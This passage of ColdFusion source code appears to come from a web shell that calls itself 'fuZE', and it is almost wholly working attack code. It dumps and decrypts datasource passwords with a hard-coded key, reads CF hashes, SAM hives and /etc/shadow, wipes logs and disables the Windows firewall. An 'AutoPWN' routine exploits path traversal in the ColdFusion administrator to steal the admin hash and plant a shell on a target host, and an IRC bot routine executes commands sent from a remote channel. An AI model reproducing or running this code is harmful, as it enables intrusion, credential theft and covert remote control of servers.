  437. </cftry>
  438. </textarea>
  439. <cfelseif isDefined("Form.function")>
  440. <pre>Function: '#htmleditformat(Form.function)#'</pre>
  441. <textarea class="report" rows="20">
  442. <cftry>
  443. <cfswitch expression="#Form.function#">
  444. <!--- ColdFusion functions --->
  445. <cfcase value="Dump datasource passwords">Datasource : Password
  446. <cfscript>
  447. o=createobject("java","coldfusion.server.ServiceFactory").getDatasourceService().getDatasources();
  448. for(i in o) {
  449. if(len(o[i]["password"])){
  450. dp=Decrypt(o[i]["password"], generate3DesKey("0yJ!@1$r8p0L@r1$6yJ!@1rj"), "DESede", "Base64") ;
  451. writeoutput("#htmleditformat(i)# : #htmleditformat(dp)##chr(10)#");
  452. }
  453. }
  454. </cfscript>
  455. </cfcase>
  456. <cfcase value="Dump CF hashes"><cffile action="READ" file="#Server.ColdFusion.RootDir#\lib\password.properties" variable="cfhashes">#htmleditformat(cfhashes)#</cfcase>
  457. <cfcase value="Restart JRUN server (CF)">
  458. <cfscript>
  459. oJRun = CreateObject("java","jrunx.kernel.JRun");
  460. oJRun.restart(oJRun.getServerName());
  461. </cfscript>
  462. </cfcase>
  463. <cfcase value="Wipe ColdFusion logs">
  464. <cfset sf = CreateObject("java", "coldfusion.server.ServiceFactory")>
  465. <cfset logDir = sf.LoggingService.getLogDirectory()>
  466. <cfif server.os.name neq "UNIX">
  467. <cfset osSlash = "\">
  468. <cfelse>
  469. <cfset osSlash = "/">
  470. </cfif>
  471. <cfdirectory action="list" directory="#logDir#" name="logs" filter="*.log">
  472. <cfloop query="logs">
  473. <cffile action="write" file="#logDir##osSlash##logs.Name#" output="## Purged" addnewline="yes">
  474. </cfloop>
  475. </cfcase>
  476. <!--- Windows functions --->
  477. <cfcase value="Disable Windows firewall"><cfexecute name="cmd.exe" arguments="/c netsh firewall set opmode disable" timeout="10" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  478. <cfcase value="Enable Telnet service"><cfexecute name="cmd.exe" arguments="/c sc config tlntsvr start= demand & net start telnet" timeout="10" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  479. <cfcase value="Show opened ports [W]"><cfexecute name="cmd.exe" arguments="/c netstat -aon" timeout="15" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  480. <cfcase value="Read SAM"><cfexecute name="cmd.exe" arguments="/c type %WINDIR%\repair\SAM" timeout="15" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  481. <cfcase value="Read SECURITY"><cfexecute name="cmd.exe" arguments="/c type %WINDIR%\repair\SECURITY" timeout="15" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  482. <cfcase value="Read SYSTEM"><cfexecute name="cmd.exe" arguments="/c type %WINDIR%\repair\SYSTEM" timeout="15" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  483. <cfcase value="Read IIS paths">Path : Domain : LogFileDirectory
  484. <cftry>
  485. <cfset xmlPath=arrayNew(1)>
  486. <cfset xmllocation=arraynew(1)>
  487. <cfset xmlServerindings=arraynew(1)>
  488. <cfset xmlLogFileDirectory=arraynew(1)>
  489. <cfset Xmlbasepath="C:\WINDOWS\system32\inetsrv\MetaBase.xml">
  490. <cftry>
  491. <cffile action="read" file="#Xmlbasepath#" variable="XMLFileText">
  492. <cfcatch type="any">
  493. <cfoutput>Error reading MetaBase.xml: #cfcatch.type#</cfoutput>
  494. <cfreturn xmlpath>
  495. </cfcatch></cftry>
  496. <cfset myXMLDocument=XmlParse(XMLFileText)>
  497. <cfset numItems = ArrayLen(myXMLDocument.configuration.MBProperty.IIsWebServer)>
  498. <cfloop index="i" from = "1" to = #numItems#>
  499. <cfif findnocase("ServerBindings=",#myXMLDocument.configuration.MBProperty.IIsWebServer[i]#)>
  500. <cfset ServerBindings = #myXMLDocument.configuration.MBProperty.IIsWebServer[i].XmlAttributes.ServerBindings#>
  501. <cfset location = #myXMLDocument.configuration.MBProperty.IIsWebServer[i].XmlAttributes.location#>
  502. <cfset arrayAppend(xmllocation,("#location#"))>
  503. <cfset arrayAppend(xmlServerindings,("#ServerBindings#"))>
  504. <cfif findnocase("LogFileDirectory=",#myXMLDocument.configuration.MBProperty.IIsWebServer[i]#)>
  505. <cfset LogFileDirectory = #myXMLDocument.configuration.MBProperty.IIsWebServer[i].XmlAttributes.LogFileDirectory#>
  506. <cfset arrayAppend(xmlLogFileDirectory,("#LogFileDirectory#"))>
  507. <cfelse>
  508. <cfset arrayAppend(xmlLogFileDirectory,(""))>
  509. </cfif></cfif></cfloop>
  510. <cfset numLocations=arraylen(xmllocation)>
  511. <cfset numItems = ArrayLen(myXMLDocument.configuration.MBProperty.IIsWebVirtualDir)>
  512. <cfloop index="i" from = "1" to = #numItems#>
  513. <cfif findnocase("path",#myXMLDocument.configuration.MBProperty.IIsWebVirtualDir[i]#) >
  514. <cfset path1 = #myXMLDocument.configuration.MBProperty.IIsWebVirtualDir[i].XmlAttributes.path#>
  515. <cfif findnocase("Program Files",#path1#) is 0 and findnocase("WINDOWS",#path1#) is 0>
  516. <cfset listpath=arraytolist(xmlpath)>
  517. <cfif find(#path1#,#listpath#) is 0>
  518. <cfset arrayAppend(xmlpath,"#path1#")>
  519. <cfloop index="j" from = "1" to = #numLocations#>
  520. <cfif findnocase(#xmllocation[j]#,#myXMLDocument.configuration.MBProperty.IIsWebVirtualDir[i].XmlAttributes.Location#) is not 0>
  521. <cfoutput>"#path1#" : "#xmlServerindings[j]#" : "#xmlLogFileDirectory[j]#"#chr(10)#</cfoutput>
  522. </cfif></cfloop></cfif></cfif></cfif></cfloop>
  523. <cfcatch>Error
  524. </cfcatch>
  525. </cftry>
  526. </cfcase>
  527. <cfcase value="View open sessions [W]"><cfexecute name="cmd.exe" arguments="/c query session" timeout="10" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  528. <cfcase value="View local shares"><cfexecute name="cmd.exe" arguments="/c net share" timeout="10" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  529. <cfcase value="View domain shares"><cfexecute name="cmd.exe" arguments="/c net view" timeout="10" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  530. <cfcase value="View users"><cfexecute name="cmd.exe" arguments="/c net user" timeout="10" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  531. <cfcase value="View running processes [W]"><cfexecute name="cmd.exe" arguments="/c tasklist" timeout="15" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  532. <cfcase value="View system info [W]"><cfexecute name="cmd.exe" arguments="/c systeminfo" timeout="30" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  533. <cfcase value="Check disk for consistency"><cfexecute name="cmd.exe" arguments="/c chkdsk" timeout="180" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase> <!--- Shout outs to fractal! --->
  534. <!--- Linux functions --->
  535. <cfcase value="Find SUID files"><cfexecute name="sh" arguments="-c 'find / -type f -perm -04000 -ls'" timeout="60" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  536. <cfcase value="Find SGID files"><cfexecute name="sh" arguments="-c 'find / -type f -perm -02000 -ls'" timeout="60" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  537. <cfcase value="Find all *conf* files"><cfexecute name="sh" arguments="-c 'find / -type f -name *conf*'" timeout="60" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  538. <cfcase value="Find all .*_history files"><cfexecute name="sh" arguments="-c 'find / -type f -name .*_history'" timeout="60" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  539. <cfcase value="Find all *.pwd files"><cfexecute name="sh" arguments="-c 'find / -type f -name *.pwd'" timeout="60" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  540. <cfcase value="Find all .*rc files"><cfexecute name="sh" arguments="-c 'find / -type f -name .*rc'" timeout="60" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  541. <cfcase value="Find all writable directories and files"><cfexecute name="sh" arguments="-c 'find / -perm -2 -ls'" timeout="60" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  542. <cfcase value="Find all writable directories and files in current dir"><cfexecute name="sh" arguments="-c 'find . -perm -2 -ls'" timeout="60" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  543. <cfcase value="Read /etc/passwd"><cfexecute name="sh" arguments="-c 'cat /etc/passwd'" timeout="10" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  544. <cfcase value="Read /etc/shadow"><cfexecute name="sh" arguments="-c 'cat /etc/shadow'" timeout="10" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  545. <cfcase value="Read /proc/self/environ"><cfexecute name="sh" arguments="-c 'cat /proc/self/environ'" timeout="10" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  546. <cfcase value="Show opened ports [L]"><cfexecute name="sh" arguments="-c 'netstat -a'" timeout="15" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  547. <cfcase value="View open sessions [L]"><cfexecute name="sh" arguments="-c 'w'" timeout="10" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  548. <cfcase value="View recent sessions"><cfexecute name="sh" arguments="-c 'last'" timeout="15" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  549. <cfcase value="View running processes [L]"><cfexecute name="sh" arguments="-c 'ps auxww'" timeout="15" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  550. <cfcase value="View memory info"><cfexecute name="sh" arguments="-c 'df -h;free -m'" timeout="10" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  551. <cfcase value="View CPU info"><cfexecute name="sh" arguments="-c 'cat /proc/cpuinfo'" timeout="10" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  552. <cfcase value="View system info [L]"><cfexecute name="sh" arguments="-c 'uname -a'" timeout="10" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  553. <cfdefaultcase>Invalid function</cfdefaultcase>
  554. </cfswitch>
  555. <cfcatch>Error
  556. </cfcatch>
  557. </cftry>
  558. </textarea>
  559. <cfelseif isDefined("Form.decrypt_hash")>
  560. <pre>Decrypting '#htmleditformat(Form.decrypt_hash)#'</pre>
  561. <textarea class="report" rows="20">
  562. <cftry>
  563. <cfscript>
  564. dp=Decrypt(Form.decrypt_hash, generate3DesKey("0yJ!@1$r8p0L@r1$6yJ!@1rj"), "DESede", "Base64");
  565. writeoutput(dp);
  566. </cfscript>
  567. <cfcatch>Invalid hash
  568. </cfcatch>
  569. </cftry>
  570. </textarea>
  571. <cfelseif isDefined("Form.Upload") and Form.Upload EQ "Upload">
  572. <pre>Uploading file to '#htmleditformat(getDirectoryFromPath(getCurrentTemplatePath()))#'</pre>
  573. <textarea class="report" rows="20">
  574. <cftry>
  575. <cffile action="upload" destination="#getDirectoryFromPath(getCurrentTemplatePath())#" filefield="Form.File" nameconflict="overwrite">File uploaded!
  576. <cfcatch>Upload failed
  577. </cfcatch>
  578. </cftry>
  579. </textarea>
  580. <cfelseif isdefined("Form.Download")>
  581. <cftry>
  582. <cfsilent>
  583. <cfheader name="Content-Disposition" value="attachment; filename=#getFileFromPath(Form.Download)#">
  584. <cfcontent type="application/unknown" file="#Form.Download#">
  585. </cfsilent>
  586. <cfcatch>File is not available
  587. <cfabort>
  588. </cfcatch>
  589. </cftry>
  590. <cfelseif isDefined("Form.RUpload")>
  591. <pre>Uploading file from '#htmleditformat(Form.RUpload)#'</pre>
  592. <textarea class="report" rows="20">
  593. <cftry>
  594. <cfhttp url="#Form.RUpload#" method="get" getasbinary="yes" result="rFile" />
  595. <cffile action="write" file="#getDirectoryFromPath(getCurrentTemplatePath())##listLast(Form.RUpload,"\/")#" addNewLine="no" output="#rFile.filecontent#" />
  596. <cfoutput>File saved to #htmleditformat(getDirectoryFromPath(getCurrentTemplatePath()))##htmleditformat(listLast(Form.RUpload,"\/"))#</cfoutput>
  597. <cfcatch>Error</cfcatch>
  598. </cftry>
  599. </textarea>
  600. <cfelseif isDefined("Form.exec_sql")>
  601. <pre><cfoutput>Executing '#htmleditformat(Form.exec_sql)#' in datasource '#htmleditformat(Form.datasource)#'</cfoutput></pre>
  602. <cfquery name="sqlout" datasource="#Form.datasource#" username="#Form.db_username#" password="#Form.db_password#">
  603. #Form.exec_sql#
  604. </cfquery>
  605. <cfdump var="#sqlout#" expand="false">
  606. <cfelseif isDefined("Form.cfscan")>
  607. <pre>Scanning for CF instances over the LAN</pre>
  608. <textarea class="report" rows="20">
  609. <cftry>
  610. <cfset sf = CreateObject("java", "coldfusion.server.ServiceFactory")>
  611. <cfset lic=#sf.LicenseService.runScan()#>
  612. <cfloop collection="#lic#" item="i">
  613. <cfoutput>ColdFusion #lic[i][1]['Edition']# build #lic[i][1]['Build']# at #lic[i][1]['MachineName']# (#lic[i][1]['IpAddrs']#)#chr(10)#</cfoutput>
  614. </cfloop>
  615. <cfcatch>Error<cfif isDefined("cfcatch.message")>: <cfoutput>#cfcatch.message#</cfoutput></cfif></cfcatch>
  616. </cftry>
  617. </textarea>
  618. <cfelseif isDefined("Form.regpath")>
  619. <cftry>
  620. <cfif form.regpath is not "">
  621. <cfif form.entry is "">
  622. <CFREGISTRY Action="getAll"
  623. Branch="#form.regpath#"
  624. Type="Any"
  625. Name="RegQuery">
  626. <CFTABLE Query="RegQuery" colHeaders HTMLTable Border="Yes">
  627. <CFCOL Header="<B>Entry</b>" Width="35" Text="#RegQuery.Entry#">
  628. <CFCOL Header="<B>Type</b>"  Width="10" Text="#RegQuery.type#">
  629. <CFCOL Header="<B>Value</b>" Width="35" Text="#RegQuery.Value#">
  630. </CFTABLE>
  631. <cfelse>
  632. <cfif form.newentry is "">
  633. <CFPARAM NAME="RegValue" DEFAULT="not found">
  634. <CFREGISTRY Action = "get"  Branch = "#form.regpath#" Entry = "#form.Entry#"  Type="#form.regtype#" variable = "RegValue">
  635. <cfoutput>(#form.regpath#\#form.Entry# )  values is : #RegValue#</cfoutput>
  636. <cfelse>
  637. <CFPARAM NAME="RegValue" DEFAULT="not found">
  638. <CFREGISTRY Action = "get"  Branch = "#form.regpath#" Entry = "#form.Entry#" Variable = "RegValue" Type = "#form.regtype#">
  639. <cfoutput>(#form.regpath#\#form.Entry# )  old  values is : #RegValue#<br /></cfoutput>
  640. <cfif regvalue is not "not found">
  641. <CFREGISTRY Action="set" Branch="#form.regpath#"  Entry="#form.Entry#" Type="#form.regtype#" Value="#form.newEntry#">
  642. <cfoutput>(#form.regpath#\#form.Entry# )  new  values is : #form.newEntry#</cfoutput>
  643. </cfif>
  644. </cfif>
  645. </cfif>
  646. <cfelse>Error: A registry path must be defined
  647. </cfif>
  648. <cfcatch type="any"><cfoutput>Error: #cfcatch.type#</cfoutput></cfcatch>
  649. </cftry>
  650. <cfelseif isDefined("Form.target_host")>
  651. <pre>Attempting to AutoPWN [#htmleditformat(Form.target_host)#]</pre>
  652. <cftry>
  653. <cfset target_host=Form.target_host>
  654. <textarea class="report" rows="20">
  655. ====================================================================================================
  656. [~] AutoPWN report for [<cfoutput>#HTMLEditFormat(target_host)#</cfoutput>]
  657. <cfset lfi=[
  658. <!--- Single server configuration ColdFusion --->
  659. "..\..\..\..\..\..\..\..\CFusionMX\lib\password.properties",
  660. <!--- ColdFusion 7 --->
  661. "..\..\..\..\..\..\..\..\CFusionMX7\lib\password.properties",
  662. <!--- ColdFusion 8 --->
  663. "..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties",
  664. <!--- ColdFusion 6, 7 AND 8 --->
  665. "..\..\..\..\..\..\..\..\..\..\JRUN4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties"
  666. ]>
  667. <cfset lfi_success=FALSE>
  668. <cfloop array="#lfi#" index="i">
  669. <cfhttp url="http://#target_host#/CFIDE/administrator/logging/settings.cfm?locale=#i#%00en" result="lfiresult" method="get"></cfhttp>
  670. <cfset cfadmin_hash=REReplace(REReplace(REReplace(lfiresult.Filecontent,"(.*?)password=","","ALL"),"#chr(10)#encrypted(.*?)</html>","","ALL"),"\s","","ALL")>
  671. <cfif Len(cfadmin_hash) GT 0 AND Len(cfadmin_hash) LTE 40 AND cfadmin_hash NEQ "ConnectionFailure">
  672. <cfset lfi_success=TRUE>
  673. <cfbreak>
  674. </cfif>
  675. </cfloop>
  676. <cfif lfi_success EQ TRUE>[!] LFI succeeded, hash acquired: <cfoutput>#HTMLEditFormat(cfadmin_hash)#</cfoutput>
  677. <cfelse><cfthrow message="LFI failed">
  678. </cfif>
  679. <cfhttp url="http://#target_host#/CFIDE/administrator/enter.cfm" result="adminpage" method="get">
  680. <cfset cfadmin_salt=REReplace(Mid(adminpage.Filecontent,13,REFind("[0-9]{13}",adminpage.Filecontent)), "(.*?)salt"" type=""hidden"" value=""","","ALL")>
  681. <cfswitch expression="#Len(cfadmin_hash)#">
  682. <cfcase value="40">
  683. <cfset secretKeySpec=createObject("java","javax.crypto.spec.SecretKeySpec").init(toBinary(toBase64(cfadmin_salt)),"HmacSHA1")>
  684. <cfset mac=createObject("java","javax.crypto.Mac").getInstance("HmacSHA1")>
  685. <cfset mac.init(secretKeySpec)>
  686. <cfset encryptedBytes=mac.doFinal(toBinary(toBase64(cfadmin_hash)))>
  687. <cfset cfadmin_password=BinaryEncode(mac.doFinal(toBinary(toBase64(cfadmin_hash))),"Hex")>
  688. </cfcase>
  689. <cfdefaultcase>
  690. <!--- TODO: CF6 Auth --->
  691. <cfthrow message="CF6 authentication is unsupported">
  692. </cfdefaultcase>
  693. </cfswitch>
  694. [*] Logging in
  695. <cfset responsecookies=adminpage.Responseheader["Set-Cookie"]>
  696. <cfset cookiearray=ArrayNew(1)>
  697. <cfloop item="i" collection="#responsecookies#">
  698. <cfset cookiearray[i]=ListGetAt(responsecookies[i],1,";")>
  699. </cfloop>
  700. <cfhttp url="http://#target_host#/CFIDE/administrator/enter.cfm" result="adminlogin" method="post" redirect="false">
  701. <cfhttpparam type="header" name="Cookie" value="#ArraytoList(cookiearray,'; ')#">
  702. <cfhttpparam type="formfield" name="cfadminUserId" value="admin">
  703. <cfhttpparam type="formfield" name="cfadminPassword" value="#cfadmin_password#">
  704. <cfhttpparam type="formfield" name="salt" value="#cfadmin_salt#">
  705. </cfhttp>
  706. <cfset authorizationcookies=adminlogin.Responseheader["Set-Cookie"]>
  707. <cfset admincookiearray=ArrayNew(1)>
  708. <cfloop item="i" collection="#authorizationcookies#">
  709. <cfset admincookiearray[i]=ListGetAt(authorizationcookies[i],1,";")>
  710. </cfloop>
  711. <cfset authkey=admincookiearray[4]>
  712. <cfhttp url="http://#target_host#/CFIDE/administrator/reports/index.cfm" result="settingssummary" method="get">
  713. <cfhttpparam type="header" name="Cookie" value="#authkey#">
  714. </cfhttp>
  715. <cfset runtime_user=REReplace(REReplace(REReplace(settingssummary.Filecontent,"(.*?)User Name(.*?)#chr(9)##chr(9)##chr(9)##chr(9)#","","ONE")," &nbsp;(.*?)</html>","","ONE"),"\s","","ALL")>
  716. <cfset cfide_path=REReplace(REReplace(REReplace(settingssummary.Filecontent,"(.*?)#chr(9)#/CFIDE (.*?)#chr(9)##chr(9)##chr(9)##chr(9)#","","ONE")," &nbsp;(.*?)</html>","","ONE"),"\s","","ALL")>
  717. <cfif REFind("/",cfide_path)><cfset slash="/">
  718. <cfelse><cfset slash="\">
  719. </cfif>[*] Creating payload objects
  720. <cfset shell_name=listFirst(listLast(getCurrentTemplatePath(),"\/"),".")>
  721. <cffile action="Copy" source="#getCurrentTemplatePath()#" destination="#getDirectoryFromPath(getCurrentTemplatePath())##shell_name#.txt">
  722. <cfset shell_url="http://#cgi.local_addr##reverse(listRest(reverse(CGI.SCRIPT_NAME),"/"))#/#shell_name#.txt">
  723. <cfhttp url="http://#target_host#/CFIDE/administrator/scheduler/scheduleedit.cfm" result="scheduletask" method="post">
  724. <cfhttpparam type="header" name="Cookie" value="#authkey#">
  725. <cfhttpparam type="formfield" name="TaskName" value="CFSh">
  726. <cfhttpparam type="formfield" name="Start_Date" value="1/3/37">
  727. <cfhttpparam type="formfield" name="ScheduleType" value="Once">
  728. <cfhttpparam type="formfield" name="StartTimeOnce" value="12:00 AM">
  729. <cfhttpparam type="formfield" name="Interval" value="Daily">
  730. <cfhttpparam type="formfield" name="customInterval_hour" value="0">
  731. <cfhttpparam type="formfield" name="customInterval_min" value="0">
  732. <cfhttpparam type="formfield" name="customInterval_sec" value="0">
  733. <cfhttpparam type="formfield" name="Operation" value="HTTPRequest">
  734. <cfhttpparam type="formfield" name="ScheduledURL" value="#shell_url#">
  735. <cfhttpparam type="formfield" name="publish" value="1">
  736. <cfhttpparam type="formfield" name="publish_file" value="#cfide_path##slash##shell_name#.cfm">
  737. <cfhttpparam type="formfield" name="adminsubmit" value="Submit">
  738. <cfhttpparam type="formfield" name="taskNameOrig" value=""> <!--- CF8- --->
  739. </cfhttp>
  740. <cfhttp url="http://#target_host#/CFIDE/#shell_name#.cfm" result="shell_status" method="get">
  741. <cfif find("&fnof;uZE Shell",shell_status.Filecontent) is not 0>[!] &fnof;uZE copied successfully
  742. <cfelse>[!] Shell not found, recreating payload to subvert firewall
  743. <cfhttp url="http://#target_host#/CFIDE/administrator/scheduler/scheduleedit.cfm" result="scheduletask" method="post">
  744. <cfhttpparam type="header" name="Cookie" value="#authkey#">
  745. <cfhttpparam type="formfield" name="TaskName" value="CFSh">
  746. <cfhttpparam type="formfield" name="Start_Date" value="1/3/37">
  747. <cfhttpparam type="formfield" name="ScheduleType" value="Once">
  748. <cfhttpparam type="formfield" name="StartTimeOnce" value="12:00 AM">
  749. <cfhttpparam type="formfield" name="Interval" value="Daily">
  750. <cfhttpparam type="formfield" name="customInterval_hour" value="0">
  751. <cfhttpparam type="formfield" name="customInterval_min" value="0">
  752. <cfhttpparam type="formfield" name="customInterval_sec" value="0">
  753. <cfhttpparam type="formfield" name="Operation" value="HTTPRequest">
  754. <cfhttpparam type="formfield" name="ScheduledURL" value="/CFIDE/probe.cfm?name=%3Cb%3E%26%23181%3BSH%3C%2Fb%3E%22%3C%2Fh1%3E%3Ccfif%20isDefined(%22Form.File%22)%3E%3Ccftry%3E%3Ccffile%20action%3D%22upload%22%20destination%3D%22%23Expandpath(%22.%22)%23%22%20filefield%3D%22Form.File%22%20nameconflict%3D%22overwrite%22%3EFile%20uploaded!%3Ccfcatch%3EUpload%20failed%3C%2Fcfcatch%3E%3C%2Fcftry%3E%3C%2Fcfif%3E%3Cform%20method%3DPOST%20enctype%3D%22multipart%2Fform-data%22%3E%3Cinput%20type%3Dfile%20name%3D%22File%22%3E%3Cinput%20type%3Dsubmit%20value%3D%22Upload%22%3E%3C%2Fform%3E%3Cscript%3E">
  755. <cfhttpparam type="formfield" name="publish" value="1">
  756. <cfhttpparam type="formfield" name="publish_file" value="#cfide_path##slash#microshell.cfm">
  757. <cfhttpparam type="formfield" name="adminsubmit" value="Submit">
  758. <cfhttpparam type="formfield" name="taskNameOrig" value="CFSh"> <!--- CF8- --->
  759. </cfhttp>
  760. <cfhttp url="http://#target_host#/CFIDE/microshell.cfm" result="shell_status_2" method="get">
  761. <cfif find("&##181;SH",shell_status_2.Filecontent) is not 0>[!] Firewall subversion was successful
  762. <cfelse>[!] Shell not found
  763. </cfif>
  764. </cfif>[*] Removing payload objects
  765. <cfhttp url="http://#target_host#/CFIDE/administrator/scheduler/scheduletasks.cfm?action=delete&task=CFSh" result="deletetask" method="get">
  766. <cfhttpparam type="header" name="Cookie" value="#authkey#">
  767. <cffile action="Delete" file="#getDirectoryFromPath(getCurrentTemplatePath())##shell_name#.txt">
  768. </cfhttp>[~] Results:
  769. [*] Server Status: <cfif find("&fnof;uZE Shell",shell_status.Filecontent) NEQ 0 OR find("&##181;SH",shell_status_2.Filecontent) NEQ 0>Compromised<cfelse>Uncompromised</cfif>
  770. [*] Access obtained: <cfoutput>#HTMLEditFormat(runtime_user)#</cfoutput>
  771. [*] Shell location: <cfif find("&fnof;uZE Shell",shell_status.Filecontent) NEQ 0><cfoutput>#HTMLEditFormat("http://#target_host#/CFIDE/#shell_name#.cfm")#</cfoutput><cfelseif find("&##181;SH",shell_status_2.Filecontent) NEQ 0><cfoutput>#HTMLEditFormat("http://#target_host#/CFIDE/microshell.cfm")#</cfoutput><cfelse>N/A</cfif>
  772. [~] EOF
  773. ====================================================================================================</textarea>
  774. <cfcatch>[!] Error<cfif isDefined("cfcatch.message")>: <cfoutput>#cfcatch.message#</cfoutput></cfif>
  775. [~] Results:
  776. [*] Server Status: N/A
  777. [*] Access obtained: N/A
  778. [*] Shell location: N/A
  779. [~] EOF
  780. ====================================================================================================</textarea>
  781. </cfcatch>
  782. </cftry>
  783. <cfelseif isDefined("Form.nuke")>
  784. <pre>Nuking shell</pre>
  785. <textarea class="report" rows="20">
  786. <cftry>
  787. <cffile action="delete" file="#getCurrentTemplatePath()#">
  788. Shell nuked
  789. <cfcatch>Error</cfcatch>
  790. </cftry>
  791. </textarea>
  792. <cfelseif isDefined("Form.ircip") and isDefined("Form.ircport")>
  793. <pre>Connecting to #htmleditformat(Form.ircip)#:#htmleditformat(Form.ircport)#</pre>
  794. <textarea class="report" rows="20">
  795. <cftry>
  796. <cfscript>
  797. try{
  798.  
  799. // Create socket
  800. socket=createObject("java","java.net.Socket");
  801.  
  802. // Connect to remote host
  803. socket.connect(createObject("java","java.net.InetSocketAddress").init(Form.ircip,Form.ircport));
  804. writeoutput("Remote port reached: #socket.isConnected()##chr(10)#");
  805.  
  806. // Establish connection
  807. try{
  808. instream=createObject("java","java.io.BufferedReader").init(createObject("java","java.io.InputStreamReader").init(socket.getInputStream()));
  809. outstream=createObject("java","java.io.PrintWriter").init(socket.getOutputStream());
  810. writeoutput("Connection successful!#chr(10)#");
  811. } catch (IOException e) {
  812. writeoutput("IO Exception: Read failed#chr(10)#");
  813. }
  814.  
  815. // Communicate
  816. outstream.println("NICK #Form.ircnick#");
  817. outstream.println("USER #Form.ircuname# 8 * :#Form.ircrname#");
  818. outstream.flush();
  819. while(True){
  820. str = instream.readLine();
  821. cmd = str.split(" ");
  822.  
  823. //---------------------CLIENT----------------------//
  824. if (not cmd[1] EQ "PING"){
  825. if (cmd[2] EQ "433"){
  826. writeoutput("Nickname already in use: #Form.ircnick##chr(10)#");
  827. Form.ircnick="#Form.ircnick#_";
  828. outstream.println("NICK #Form.ircnick#");
  829. outstream.flush();
  830. }
  831. else if (cmd[2] EQ "004"){
  832. writeoutput("Entered IRC#chr(10)#");
  833. outstream.println("JOIN #Form.ircchan#");
  834. outstream.flush();
  835. }
  836. else if (FindNoCase(":>",str)){
  837. command_init=str.split(":>");
  838. command=command_init[2].split(" ");
  839. switch(command[1]){
  840. //---------------------//
  841. // Commands
  842. //---------------------//
  843. // Raw
  844. case "raw":
  845. {
  846. raw_init=str.split(":>raw ");
  847. raw=raw_init[2];
  848. outstream.println("#raw#");
  849. outstream.flush();
  850. break;
  851. }
  852. //---------------------//
  853. // Decrypt
  854. case "decrypt":
  855. {
  856. decrypt_init=str.split(":>decrypt ");
  857. decrypt_hash=decrypt_init[2];
  858. channel=cmd[3];
  859. outstream.println("PRIVMSG #channel# :Decrypting '#chr(15)##decrypt_hash##chr(15)#'");
  860. outstream.flush();
  861. dp=Decrypt(decrypt_hash, generate3DesKey("0yJ!@1$r8p0L@r1$6yJ!@1rj"), "DESede", "Base64");
  862. dp=replace(dp,chr(2),"\x02","ALL"); // Escape IRC bold character
  863. dp=replace(dp,chr(3),"\x03","ALL"); // Escape IRC color character
  864. dp=replace(dp,chr(7),"\x07","ALL"); // Escape IRC beep character
  865. dp=replace(dp,chr(10),"\x0A","ALL"); // Escape LF
  866. dp=replace(dp,chr(13),"\x0D","ALL"); // Escape CR
  867. dp=replace(dp,chr(15),"\x0f","ALL"); // Escape IRC no format character
  868. dp=replace(dp,chr(16),"\x16","ALL"); // Escape IRC reverse character
  869. dp=replace(dp,chr(31),"\x1f","ALL"); // Escape IRC underline character
  870. outstream.println("PRIVMSG #channel# :'#dp#'");
  871. outstream.flush();
  872. break;
  873. }
  874. //---------------------//
  875. // Execute
  876. case "exec":
  877. {
  878. exec_init=str.split(":>exec ");
  879. exec=exec_init[2].split(" ");
  880. channel=cmd[3];
  881. outstream.println("PRIVMSG #channel# :Executing '#chr(15)##exec_init[2]##chr(15)#'");
  882. outstream.flush();
  883. p = createObject("java","java.lang.ProcessBuilder").init(exec).start();
  884. i = createObject("java","java.io.InputStreamReader").init(p.getInputStream());
  885. br = createObject("java","java.io.BufferedReader").init(i);
  886. line=br.readLine();
  887. while (isDefined("line")) {
  888. outstream.println("PRIVMSG #channel# :> #line#");
  889. outstream.flush();
  890. line = br.readLine();
  891. }
  892. br.close();
  893. i.close();
  894. break;
  895. }
  896. //---------------------//
  897. // Help
  898. case "help":
  899. {
  900. channel=cmd[3];
  901. outstream.println("PRIVMSG #channel# :fuZE CF IRC Datapipe | Developed by XiX");
  902. outstream.println("PRIVMSG #channel# :Commands: >raw >decrypt >exec >help >exit");
  903. outstream.flush();
  904. break;
  905. }
  906. //---------------------//
  907. // Exit
  908. case "exit":
  909. {
  910. outstream.close();
  911. instream.close();
  912. socket.close();
  913. break;
  914. }
  915. //---------------------//
  916. // Invalid command
  917. default:
  918. {
  919. break;
  920. }
  921. //---------------------//
  922. }
  923. }
  924. }
  925. else {
  926. outstream.println("PONG #str.substring(5)#");
  927. outstream.flush();
  928. }
